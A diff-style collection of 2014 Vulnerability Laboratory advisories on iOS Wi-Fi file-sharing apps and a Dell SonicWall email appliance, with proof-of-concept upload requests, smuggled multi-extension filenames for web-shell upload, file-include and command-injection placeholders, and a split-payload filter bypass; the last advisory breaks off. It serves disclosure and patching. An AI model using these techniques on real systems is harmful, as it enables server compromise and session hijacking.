The vulnerability is located in the `Upload File > Send Data` (resources & files) module. Remote attackers are able to upload a php or js web-shells
|
||||||
|
by renaming the file with multiple extensions to bypass the file restriction mechanism. The attacker uploads for example a web-shell with the following
|
||||||
|
name and extension `ptest.txt.html.php.js.aspx.txt`. After the upload the attacker needs to open the file with the path value in the web application.
|
||||||
|
He deletes the .txt file extension and can access the application with elevated executable access rights. The security risk of the arbitrary file
|
||||||
|
upload web vulnerability is estimated as high(+) with a cvss (common vulnerability scoring system) count of 6.9(+)|(-)7.0.
|
||||||
|
|
||||||
|
Exploitation of the arbitrary file upload web vulnerability requires no user interaction or privileged application user account with password.
|
||||||
|
Successful exploitation of the vulnerability results in unauthorized file access because of a compromise after the upload of web-shells.
|
||||||
|
|
||||||
|
Request Method(s):
|
||||||
|
[+] [POST]
|
||||||
|
|
||||||
|
Vulnerable Module(s):
|
||||||
|
[+] Upload File
|
||||||
|
|
||||||
|
Vulnerable Function(s):
|
||||||
|
[+] Send Data
|
||||||
|
|
||||||
|
Vulnerable Parameter(s):
|
||||||
|
[+] filename (multiple extensions)
|
||||||
|
|
||||||
|
Affected Module(s):
|
||||||
|
[+] Directory Dir List (http://localhost:8080/)
|
||||||
|
|
||||||
|
|
||||||
|
Proof of Concept (PoC):
|
||||||
|
=======================
|
||||||
|
1.1
|
||||||
|
The local file include web vulnerability can be exploited by remote attackers without user interaction or privileged application user account (ui passwd blank).
|
||||||
|
For security demonstration or to reproduce the remote web vulnerability follow the provided information and steps below to continue.
|
||||||
|
|
||||||
|
PoC: Local File Include Vulnerability
|
||||||
|
http://localhost:8080/private/var/mobile/Applications/7A8AF3A4-0263-4E35-9E0A-74A430C18C7A/Documents/[LOCAL FILE INCLUDE VULNERABILITY!]
|
||||||
|
|
||||||
|
|
||||||
|
--- PoC- Session Logs [POST] ---
|
||||||
|
|
||||||
|
Status: 200[OK]
|
||||||
|
POST http://localhost:8080/private/var/mobile/Applications/7A8AF3A4-0263-4E35-9E0A-74A430C18C7A/Documents/Videos?sessionid=f7aa0a7f-98cd-4477-9e1b-dda96297044a Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ]
|
||||||
|
|
||||||
|
Größe des Inhalts[1807] Mime Type[application/x-unknown-content-type]
|
||||||
|
Request Header:
|
||||||
|
Host[localhost:8080]
|
||||||
|
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0]
|
||||||
|
Accept
|
||||||
|
|
||||||
|
[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
|
||||||
|
Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
|
||||||
|
Accept-Encoding[gzip, deflate]
|
||||||
|
Referer[http://localhost:8080/private/var/mobile/Applications/7A8AF3A4
|
||||||
|
|
||||||
|
-0263-4E35-9E0A-74A430C18C7A/Documents/Videos?sessionid=f7aa0a7f-98cd-4477-9e1b-dda96297044a]
|
||||||
|
Connection[keep-alive]
|
||||||
|
POST-Daten:
|
||||||
|
POST_DATA[-----------------------------881557262072
|
||||||
|
Content-Disposition: form-data; name="uploadfile"; filename="./[LOCAL FILE INCLUDE VULNERABILITY!]"
|
||||||
|
Content-Type: image/png
|
||||||
|
|
||||||
|
|
||||||
|
1.2
|
||||||
|
The arbitary file uplaod web vulnerability can be exploited by remote attackers without user interaction or privileged application user account (ui passwd blank).
|
||||||
|
For security demonstration or to reproduce the remote web vulnerability follow the provided information and steps below to continue.
|
||||||
|
|
||||||
|
PoC: Arbitrary File Upload Vulnerability (Upload File)
|
||||||
|
http://localhost:8080/private/var/./.\[http://localhost:8080/private/var/mobile/Applications/]+File
|
||||||
|
|
||||||
|
|
||||||
|
--- PoC- Session Logs [POST] ---
|
||||||
|
|
||||||
|
Status: pending[]
|
||||||
|
POST http://localhost:8080/private/var Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[unknown] Mime Type[unknown]
|
||||||
|
Request Header:
|
||||||
|
Host[localhost:8080]
|
||||||
|
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0]
|
||||||
|
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
|
||||||
|
Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
|
||||||
|
Accept-Encoding[gzip, deflate]
|
||||||
|
Referer[http://localhost:8080/private/var]
|
||||||
|
POST-Daten:
|
||||||
|
POST_DATA[-----------------------------245202094720816
|
||||||
|
Content-Disposition: form-data; name="uploadfile"; filename="test.jpg.html.php.asp.html.jpg"
|
||||||
|
Content-Type: image/jpeg
|
||||||
|
|
||||||
|
Note: After the upload to the private /var folder the attacker is able to attach the document path with the file to compromise the web-server.
|
||||||
|
|
||||||
|
|
||||||
|
Solution - Fix & Patch:
|
||||||
|
=======================
|
||||||
|
1.1
|
||||||
|
The local file include web vulnerability can be patched by a secure parse and encode of the vulnerable filename value in the upload file POST method request.
|
||||||
|
Filter and encode also the filename output listing of the index.
|
||||||
|
|
||||||
|
1.2
|
||||||
|
Filter and restrict the file name validation on uploads to prevent arbitrary file upload attacks.
|
||||||
|
Implement a secure own exception-handling to restrict and disallow files with multiple extensions.
|
||||||
|
Reset the executable rights for html and php codes in the little web-server settings config for /files.
|
||||||
|
|
||||||
|
|
||||||
|
Security Risk:
|
||||||
|
==============
|
||||||
|
1.1
|
||||||
|
The security risk of the local file include web vulnerability is estimated as high(+).
|
||||||
|
|
||||||
|
1.2
|
||||||
|
The security risk of the arbitrary file upload web vulnerability is estimated as high.
|
||||||
|
|
||||||
|
|
||||||
|
Credits & Authors:
|
||||||
|
==================
|
||||||
|
Vulnerability Laboratory [Research Team] - Katharin S. L. (CH) (research@vulnerability-lab.com) [www.vulnerability-lab.com]
|
||||||
|
|
||||||
|
|
||||||
|
Disclaimer & Information:
|
||||||
|
=========================
|
||||||
|
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
|
||||||
|
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
|
||||||
|
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
|
||||||
|
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
|
||||||
|
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
|
||||||
|
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
|
||||||
|
or trade with fraud/stolen material.
|
||||||
|
|
||||||
|
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
|
||||||
|
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
|
||||||
|
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
|
||||||
|
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
|
||||||
|
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
|
||||||
|
|
||||||
|
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
|
||||||
|
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
|
||||||
|
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
|
||||||
|
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
|
||||||
|
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
|
||||||
|
|
||||||
|
Copyright © 2014 | Vulnerability Laboratory [Evolution Security]
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
--
|
||||||
|
VULNERABILITY LABORATORY RESEARCH TEAM
|
||||||
|
DOMAIN: www.vulnerability-lab.com
|
||||||
|
CONTACT: research@vulnerability-lab.com
|
||||||
|
|
||||||
|
|
269
platforms/hardware/webapps/32560.txt
Executable file
269
platforms/hardware/webapps/32560.txt
Executable file
|
@ -0,0 +1,269 @@
|
||||||
|
Document Title:
|
||||||
|
===============
|
||||||
|
ePhone Disk v1.0.2 iOS - Multiple Web Vulnerabilities
|
||||||
|
|
||||||
|
|
||||||
|
References (Source):
|
||||||
|
====================
|
||||||
|
http://www.vulnerability-lab.com/get_content.php?id=1230
|
||||||
|
|
||||||
|
|
||||||
|
Release Date:
|
||||||
|
=============
|
||||||
|
2014-03-25
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerability Laboratory ID (VL-ID):
|
||||||
|
====================================
|
||||||
|
1230
|
||||||
|
|
||||||
|
|
||||||
|
Common Vulnerability Scoring System:
|
||||||
|
====================================
|
||||||
|
6.9
|
||||||
|
|
||||||
|
|
||||||
|
Product & Service Introduction:
|
||||||
|
===============================
|
||||||
|
ePhone Disk is lightweight file manager that lets you download, organize, transfer, offline read your files.
|
||||||
|
It provides the most advanced WiFi sharing features in market.
|
||||||
|
|
||||||
|
SHARE FILES VIA WIFI
|
||||||
|
- Access iPhone like a USB drive from computer, simply use Drag and Drop to manage files
|
||||||
|
- Discover nearby devices, and discoverable by others
|
||||||
|
- Single tap to connect to nearby devices
|
||||||
|
- Accessible from any WebDav client
|
||||||
|
|
||||||
|
( Copy of the Homepage: https://itunes.apple.com/us/app/ephone-disk-download-share/id621895613 )
|
||||||
|
|
||||||
|
|
||||||
|
Abstract Advisory Information:
|
||||||
|
==============================
|
||||||
|
The Vulnerability Laboratory Research Team discovered multiple vulnerabilities in the official Easiermobile Inc - ePhone Disk v1.0.2 iOS mobile web-application.
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerability Disclosure Timeline:
|
||||||
|
==================================
|
||||||
|
2014-03-25: Public Disclosure (Vulnerability Laboratory)
|
||||||
|
|
||||||
|
|
||||||
|
Discovery Status:
|
||||||
|
=================
|
||||||
|
Published
|
||||||
|
|
||||||
|
|
||||||
|
Affected Product(s):
|
||||||
|
====================
|
||||||
|
Easiermobile Inc
|
||||||
|
Product: ePhone Disk iOS - Download, Share Files via WiFi 1.0.2
|
||||||
|
|
||||||
|
|
||||||
|
Exploitation Technique:
|
||||||
|
=======================
|
||||||
|
Local
|
||||||
|
|
||||||
|
|
||||||
|
Severity Level:
|
||||||
|
===============
|
||||||
|
High
|
||||||
|
|
||||||
|
|
||||||
|
Technical Details & Description:
|
||||||
|
================================
|
||||||
|
1.1
|
||||||
|
A local file include web vulnerability has been discovered in the official Easiermobile Inc - ePhone Disk v1.0.2 iOS mobile web-application.
|
||||||
|
The local file include web vulnerability allows remote attackers to unauthorized include local file/path requests or system specific path
|
||||||
|
commands to compromise the web-application or mobile device.
|
||||||
|
|
||||||
|
The web vulnerability is located in the `filename` value of the `Upload file` module. Remote attackers are able to inject own files with malicious
|
||||||
|
`filename` value in the upload POST method request to compromise the mobile web-application. The attack vector is persistent and the request
|
||||||
|
method is POST. The local file/path include execution occcurs in the main file dir list. The security risk of the local file include web vulnerability
|
||||||
|
is estimated as high(+) with a cvss (common vulnerability scoring system) count of 6.8(+)|(-)6.9.
|
||||||
|
|
||||||
|
Exploitation of the local file include web vulnerability requires no user interaction but a privileged web-application user account with low user auth.
|
||||||
|
Successful exploitation of the local file include web vulnerability results in mobile application or connected device component compromise.
|
||||||
|
|
||||||
|
Request Method(s):
|
||||||
|
[+] [POST]
|
||||||
|
|
||||||
|
Vulnerable Module(s):
|
||||||
|
[+] Upload File
|
||||||
|
|
||||||
|
Vulnerable Parameter(s):
|
||||||
|
[+] filename
|
||||||
|
|
||||||
|
Affected Module(s):
|
||||||
|
[+] Upload File > Index File Dir List (http://localhost:8080)
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
1.2
|
||||||
|
A local command/path injection web vulnerabilities has been discovered in the official Easiermobile Inc - ePhone Disk v1.0.2 iOS mobile web-application.
|
||||||
|
A command inject vulnerability allows attackers to inject local commands via vulnerable system values to compromise the apple mobile iOS application.
|
||||||
|
|
||||||
|
The vulnerability is located in the vulnerable `foldername` value of the wifi file dir list module. Local attackers are able to inject own malicious
|
||||||
|
system specific commands or path value requests in the vulnerable foldername value. The injection requires a active sync with the wifi app stored folders.
|
||||||
|
The execution of the local command inject bug via foldername value on sync occurs in the file dir index list of the main upload path. The security risk of
|
||||||
|
the local command/path inject vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.3(+)|(-)6.4.
|
||||||
|
|
||||||
|
Exploitation of the command/path inject vulnerability requires a low privileged iOS device account with restricted access and no user interaction.
|
||||||
|
Successful exploitation of the vulnerability results in unauthorized execution of system specific commands and unauthorized path value requests to
|
||||||
|
compromise the mobile iOS application or the connected device components.
|
||||||
|
|
||||||
|
Request Method(s):
|
||||||
|
[+] Sync [POST]
|
||||||
|
|
||||||
|
Vulnerable Parameter(s):
|
||||||
|
[+] foldername (path value)
|
||||||
|
|
||||||
|
Affected Module(s):
|
||||||
|
[+] ./[iPhone]/Sub Category x - File Dir Listing
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
1.3
|
||||||
|
A remote denial of service web vulnerability has been discovered in the official Easiermobile Inc - ePhone Disk v1.0.2 iOS mobile web-application.
|
||||||
|
A denial of service vulnerability allows remote attackers to block, freeze or crash the affected or vulnerable mobile online-service application.
|
||||||
|
|
||||||
|
The vulnerability is located in the vulnerable `[download]` value of the downloads module. Local attackers are able to include tags as download
|
||||||
|
path value via GET method request. The application responds with an unhandled exception and the result is a permanent online-service and
|
||||||
|
application crash. The security risk of the remote denial of service web vulnerability is estimated as low(+) with a cvss (common vulnerability
|
||||||
|
scoring system) count of 1.8(+)|(-)1.9.
|
||||||
|
|
||||||
|
Exploitation of the denial of service web vulnerability requires no privileged iOS device account but low user interaction (allow|accept).
|
||||||
|
Successful exploitation of the DoS vulnerability results in unauthorized execution of system specific commands and unauthorized path value
|
||||||
|
requests to compromise the mobile iOS application or the connected device components.
|
||||||
|
|
||||||
|
Request Method(s):
|
||||||
|
[+] [GET]
|
||||||
|
|
||||||
|
Vulnerable Parameter(s):
|
||||||
|
[+] ?download
|
||||||
|
|
||||||
|
|
||||||
|
Proof of Concept (PoC):
|
||||||
|
=======================
|
||||||
|
1.1
|
||||||
|
The local file include web vulnerability can be exploited by local attackers with low user interaction and with low privileged web-interface account.
|
||||||
|
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
|
||||||
|
|
||||||
|
PoC: Upload File > Name > [Index File Dir List]
|
||||||
|
|
||||||
|
<table xmlns="http://www.w3.org/1999/xhtml"><thead><th class="icon"/><th class="name">Name</th><th class="modifieddate">Date Modified</th>
|
||||||
|
<th class="size">Size</th><th/></thead><tbody><tr><td class="icon"><a href=".."><img src="/static/backToParent_icon.png"/></a></td>
|
||||||
|
<td class="name"><a href="..">Parent Directory</a></td><td class="modifieddate"/><td class="size"/><td/></tr><tr><td class="icon">
|
||||||
|
<a href="/iPhone/Downloads/./[LOCAL FILE INCLUDE VULNERABILITY!].png">
|
||||||
|
<img src="/iPhone/Downloads/./[LOCAL FILE INCLUDE VULNERABILITY!].png?thumbnail=1"/></a></td>
|
||||||
|
<td class="name"><a href="/iPhone/Downloads/./[LOCAL FILE INCLUDE VULNERABILITY!].png">./[LOCAL FILE INCLUDE VULNERABILITY!].png</a></td>
|
||||||
|
<td class="modifieddate">2014-03-19 14:09</td><td class="size">538 bytes</td>
|
||||||
|
<td class="download"><a href="/iPhone/Downloads/./[LOCAL FILE INCLUDE VULNERABILITY!].png?download=1">
|
||||||
|
download</a></td></tr></tbody></table>
|
||||||
|
|
||||||
|
|
||||||
|
--- PoC Sesion Logs [POST] ---
|
||||||
|
Status: 200[OK]
|
||||||
|
POST http://localhost:8080/iPhone/Downloads?upload=1 Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Gr??e des Inhalts[0] Mime Type[text/plain]
|
||||||
|
Request Header:
|
||||||
|
Host[localhost:8080]
|
||||||
|
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:27.0) Gecko/20100101 Firefox/27.0]
|
||||||
|
Accept[text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8]
|
||||||
|
Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3]
|
||||||
|
Accept-Encoding[gzip, deflate]
|
||||||
|
Referer[http://localhost:8080/iPhone/Downloads]
|
||||||
|
Connection[keep-alive]
|
||||||
|
POST-Daten:
|
||||||
|
POST_DATA[-----------------------------57142047116429
|
||||||
|
Content-Disposition: form-data; name="file"; filename="./[LOCAL FILE INCLUDE VULNERABILITY!].png"
|
||||||
|
Content-Type: image/png
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
1.2
|
||||||
|
The command inject web vulnerability can be exploited by local attackers with low user interaction and low privileged web-application user account.
|
||||||
|
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
|
||||||
|
|
||||||
|
PoC: Foldername > Name > [Index File Dir List]
|
||||||
|
|
||||||
|
<table xmlns="http://www.w3.org/1999/xhtml"><thead><th class="icon"></th><th class="name">Name</th>
|
||||||
|
<th class="modifieddate">Date Modified</th><th class="size">Size</th><th/></thead><tbody><tr><td class="icon">
|
||||||
|
<a><img src="/static/GenericFolderIcon.png"/></a></td><td class="name"><a href="/iPhone/[LOCAL COMMAND INJECTION VULNERABILITY!]>
|
||||||
|
[LOCAL COMMAND INJECTION VULNERABILITY!]">iPhone/[LOCAL COMMAND INJECTION VULNERABILITY!]</a></td><td class="modifieddate">2014-03-19 14:11</td>
|
||||||
|
<td class="size">--
|
||||||
|
</td><td class="download"/></tr></tbody></table>
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
1.3
|
||||||
|
The denial of service web vulnerability can be exploited by remote attackers with low user interaction (allow|accept).
|
||||||
|
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
|
||||||
|
|
||||||
|
PoC:
|
||||||
|
http://localhost:8080/iPhone/Downloads/[FileName].*?download=[REMOTE DENIAL OF SERVICE VULNERABILITY!]
|
||||||
|
|
||||||
|
Note: After the accept of the device owner the application permanent crashes.
|
||||||
|
A encode problem returns with an error which results in a crash via memory corruption.
|
||||||
|
|
||||||
|
|
||||||
|
Solution - Fix & Patch:
|
||||||
|
=======================
|
||||||
|
1.1
|
||||||
|
The first vulnerability can be patched by a secure parse of the filename value in the upload file module POST method request.
|
||||||
|
Encode also the output file dir index list with the vulnerable filename output value to prevent injection of malicious context.
|
||||||
|
|
||||||
|
1.2
|
||||||
|
The first vulnerability can be patched by a secure parse of the folder name value in the app sync module POST method request.
|
||||||
|
Encode also the output file dir index list with the vulnerable folder name output value to prevent injection of malicious context.
|
||||||
|
|
||||||
|
1.3
|
||||||
|
Restrict the download value to integer and allocate the memory. Implement an own little exception-handling to prevent remote denial of service attacks.
|
||||||
|
|
||||||
|
|
||||||
|
Security Risk:
|
||||||
|
==============
|
||||||
|
1.1
|
||||||
|
The security risk of the local file include vulnerability is estimated as critical.
|
||||||
|
|
||||||
|
1.2
|
||||||
|
The security risk of the local command inject vulnerability via phone foldername sync is estimated as high.
|
||||||
|
|
||||||
|
1.3
|
||||||
|
The security risk of the remote denial of service vulnerability is estimated as low(+).
|
||||||
|
|
||||||
|
|
||||||
|
Credits & Authors:
|
||||||
|
==================
|
||||||
|
Vulnerability Laboratory [Research Team] - LariX4 (research@evolution-sec.com) [www.vulnerability-lab.com]
|
||||||
|
|
||||||
|
|
||||||
|
Disclaimer & Information:
|
||||||
|
=========================
|
||||||
|
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties,
|
||||||
|
either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-
|
||||||
|
Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business
|
||||||
|
profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some
|
||||||
|
states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation
|
||||||
|
may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases
|
||||||
|
or trade with fraud/stolen material.
|
||||||
|
|
||||||
|
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
|
||||||
|
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
|
||||||
|
Section: www.vulnerability-lab.com/dev - forum.vulnerability-db.com - magazine.vulnerability-db.com
|
||||||
|
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
|
||||||
|
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
|
||||||
|
|
||||||
|
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory.
|
||||||
|
Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other
|
||||||
|
media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and
|
||||||
|
other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed),
|
||||||
|
modify, use or edit our material contact (admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
|
||||||
|
|
||||||
|
Copyright ? 2014 | Vulnerability Laboratory [Evolution Security]
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
--
|
||||||
|
VULNERABILITY LABORATORY RESEARCH TEAM
|
||||||
|
DOMAIN: www.vulnerability-lab.com
|
||||||
|
CONTACT: research@vulnerability-lab.com
|
||||||
|
|
||||||
|
|
318
platforms/multiple/webapps/32556.txt
Executable file
318
platforms/multiple/webapps/32556.txt
Executable file
|
@ -0,0 +1,318 @@
|
||||||
|
Document Title:
|
||||||
|
===============
|
||||||
|
Dell SonicWall EMail Security Appliance Application v7.4.5 - Multiple Vulnerabilities
|
||||||
|
|
||||||
|
|
||||||
|
References (Source):
|
||||||
|
====================
|
||||||
|
http://www.vulnerability-lab.com/get_content.php?id=1191
|
||||||
|
|
||||||
|
Dell (SonicWall) Security Bulletin: http://www.sonicwall.com/us/shared/download/Support-Bulletin_Email-Security_Scripting_Vulnerability__Resolved_in__ES746.pdf
|
||||||
|
|
||||||
|
|
||||||
|
Release Date:
|
||||||
|
=============
|
||||||
|
2014-03-26
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerability Laboratory ID (VL-ID):
|
||||||
|
====================================
|
||||||
|
1191
|
||||||
|
|
||||||
|
|
||||||
|
Common Vulnerability Scoring System:
|
||||||
|
====================================
|
||||||
|
3.5
|
||||||
|
|
||||||
|
|
||||||
|
Product & Service Introduction:
|
||||||
|
===============================
|
||||||
|
While most businesses now have some type of anti-spam protection, many must deal with cumbersome
|
||||||
|
management, frustrated users, inflexible solutions, and a higher-than-expected total cost of ownership.
|
||||||
|
SonicWALL® Email Security can help. Elegantly simple to deploy, manage and use, award-winning SonicWALL
|
||||||
|
Email Security solutions employ a variety of proven and patented technology designed to block spam and
|
||||||
|
other threats effectively, easily and economically. With innovative protection techniques for both
|
||||||
|
inbound and outbound email plus unique management tools, the Email Security platform delivers superior
|
||||||
|
email protection today—while standing ready to stop the new attacks of tomorrow.
|
||||||
|
|
||||||
|
SonicWALL Email Security can be flexibly deployed as a SonicWALL Email Security Appliance, as a software
|
||||||
|
application on a third party Windows® server, or as a SonicWALL Email Security Virtual Appliance in a
|
||||||
|
VMW® environment. The SonicWALL Email Security Virtual Appliance provides the same powerful protection as a
|
||||||
|
traditional SonicWALL Email Security appliance, only in a virtual form, to optimize utilization,
|
||||||
|
ease migration and reduce capital costs.
|
||||||
|
|
||||||
|
(Copy of the Vendor Homepage: http://www.sonicwall.com/us/products/Anti-Spam_Email_Security.html)
|
||||||
|
|
||||||
|
|
||||||
|
Abstract Advisory Information:
|
||||||
|
==============================
|
||||||
|
The Vulnerability Laboratory Research Team discovered multiple persistent input validation vulnerabilities in the official Dell SonicWall EMail Security Appliance v7.4.6 Web-Application.
|
||||||
|
|
||||||
|
|
||||||
|
Vulnerability Disclosure Timeline:
|
||||||
|
==================================
|
||||||
|
2014-02-07: Researcher Notification & Coordination (Benjamin Kunz Mejri)
|
||||||
|
2014-02-08: Vendor Notification (Dell Security Team)
|
||||||
|
2014-02-14: Vendor Response/Feedback (Dell Security Team)
|
||||||
|
2014-03-25: Vendor Fix/Patch (SonicWall Developer Team)
|
||||||
|
2014-03-26: Public Disclosure (Vulnerability Laboratory)
|
||||||
|
|
||||||
|
|
||||||
|
Discovery Status:
|
||||||
|
=================
|
||||||
|
Published
|
||||||
|
|
||||||
|
|
||||||
|
Affected Product(s):
|
||||||
|
====================
|
||||||
|
DELL SonicWall
|
||||||
|
Product: EMail Security Appliance Application 7.4.5.1393
|
||||||
|
|
||||||
|
|
||||||
|
Exploitation Technique:
|
||||||
|
=======================
|
||||||
|
Remote
|
||||||
|
|
||||||
|
|
||||||
|
Severity Level:
|
||||||
|
===============
|
||||||
|
Medium
|
||||||
|
|
||||||
|
|
||||||
|
Technical Details & Description:
|
||||||
|
================================
|
||||||
|
Multiple persistent input validation web vulnerabilities has been discovered in the official Dell SonicWall EMail Security Appliance v7.4.6 Web-Application.
|
||||||
|
The vulnerability allows remote attackers or low privileged user accounts to inject own malicious script codes via POST method request to compromise the
|
||||||
|
application or user session data/information.
|
||||||
|
|
||||||
|
The first vulnerability is located in the `filename` value of the `settings_advanced.html` file. Remote attackers and low privileged application user accounts
|
||||||
|
are able to inject own malicious script codes to the application-side of the `Advanced Settings - Patch hochladen > Patch-Datei` module. Attackers can manipulate
|
||||||
|
the file upload POST method request by tampering the session. Next to tampering the session the attacker exchange the file name with a malicious script code
|
||||||
|
as payload. In the next step the website reloads the next firmware upgrade page (wait.html) with the file details. The execute of the injected script code
|
||||||
|
via POST method request occurs at the location of the listed file name value. The security risk of the persistent validation web vulnerability is estimated
|
||||||
|
as medium with a cvss (common vulnerability scoring system) count of 3.5(-).
|
||||||
|
|
||||||
|
The second vulnerability is located in the file name value of the settings_upload_dlicense.html file. Remote attackers and low privileged application user accounts
|
||||||
|
are able to inject own malicious script codes to the application-side of the Lizenz Verwaltung - Lizenzen Upload module. The request method is POST and the attack
|
||||||
|
vector is persistent. The execute occurs in the exception context of the license update page module. The security risk of the persistent validation web
|
||||||
|
vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 3.0(+).
|
||||||
|
|
||||||
|
Exploitation of both vulnerabilities requires to bypass the regular validation of the web application appliance. To bypass the filter remote attackers can inject two
|
||||||
|
payloads with a split in the middle. The validation encodes the first injected payload and the second after the split executes the code.
|
||||||
|
|
||||||
|
Exploitation of the remote web vulnerabilities requires a privileged user account without user interaction or a remote user with medium to high user interaction.
|
||||||
|
Successful exploitation of the persistent web vulnerabilities results in session hijacking, persistent external redirects, persistent phishing and persistent
|
||||||
|
manipulation of vulnerable connected or affected modules.
|
||||||
|
|
||||||
|
Request Method:
|
||||||
|
[+] POST
|
||||||
|
|
||||||
|
Vulnerable Module:
|
||||||
|
[+] Advanced Settings - Patch hochladen > Patch-Datei (settings_advanced.html)
|
||||||
|
[+] Lizenz Verwaltung - Lizenzen Upload > (settings_upload_dlicense.html)
|
||||||
|
|
||||||
|
Vulnerable Parameter(s):
|
||||||
|
[+] file name
|
||||||
|
|
||||||
|
Affected Module(s):
|
||||||
|
[+] Firmware Update - Waiting Page (wait.html)
|
||||||
|
[+] License Update Page (exception)
|
||||||
|
|
||||||
|
Affected Version(s):
|
||||||
|
[+] 7.4.6
|
||||||
|
|
||||||
|
Affected Appliance Model(s):
|
||||||
|
[+] Dell SonicWall EMail Security Appliance Web Application - All Models
|
||||||
|
|
||||||
|
|
||||||
|
Proof of Concept (PoC):
|
||||||
|
=======================
|
||||||
|
The two persistent input validation web vulnerabilities can be exploited by remote attackers with low privileged email security application user account and
|
||||||
|
low user interaction or without privileged web-application user account on client-side via POST inject. For security demonstration or to reproduce the
|
||||||
|
vulnerability follow the provided information and steps below.
|
||||||
|
|
||||||
|
|
||||||
|
URL: Input
|
||||||
|
http://ess.localhost:8619/settings_advanced.html
|
||||||
|
|
||||||
|
URL: Execute
|
||||||
|
http://ess.localhost:8619/wait.html
|
||||||
|
|
||||||
|
|
||||||
|
PoC: Firmware Update - Status Waiting Site
|
||||||
|
|
||||||
|
<div style="border-radius: 10px;" class="warning_bubble_content">
|
||||||
|
<div class="bubble_title">Die Firmware wird aktualisiert...</div>
|
||||||
|
<div class="bubble_text">
|
||||||
|
<div id="updaterMessage">
|
||||||
|
Installationsdateien werden vorbereitet. Starten Sie keine Dienste neu!
|
||||||
|
<div class="alert">Email Security ist immer noch mit der Verarbeitung von E-Mails beschäftigt.</div>
|
||||||
|
</div>
|
||||||
|
<div>Aktuelle Produktversion von Email Security 7.4.5.1393.</div>
|
||||||
|
<div>Upgrade mit >>"%20<[PERSISTENT INJECTED SCRIPT CODE!]>.jpg.</div>
|
||||||
|
<br>
|
||||||
|
<div><div class="dotdot lefthand"></div></div>
|
||||||
|
<div>Abgelaufene Zeit: <span id="updateMS">00:00:36</span></div>
|
||||||
|
<div id="installProgressText" class="tail_trail"></div>
|
||||||
|
</div>
|
||||||
|
</div>
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
--- PoC Session Logs [POST] ---
|
||||||
|
|
||||||
|
Status: 302[Moved Temporarily]
|
||||||
|
POST http://ess.localhost:8619/settings_advanced.html Load Flags[LOAD_DOCUMENT_URI LOAD_INITIAL_DOCUMENT_URI ] Größe des Inhalts[0] Mime Type[text/html]
|
||||||
|
Request Header:
|
||||||
|
Host[esserver.demo.sonicwall.com]
|
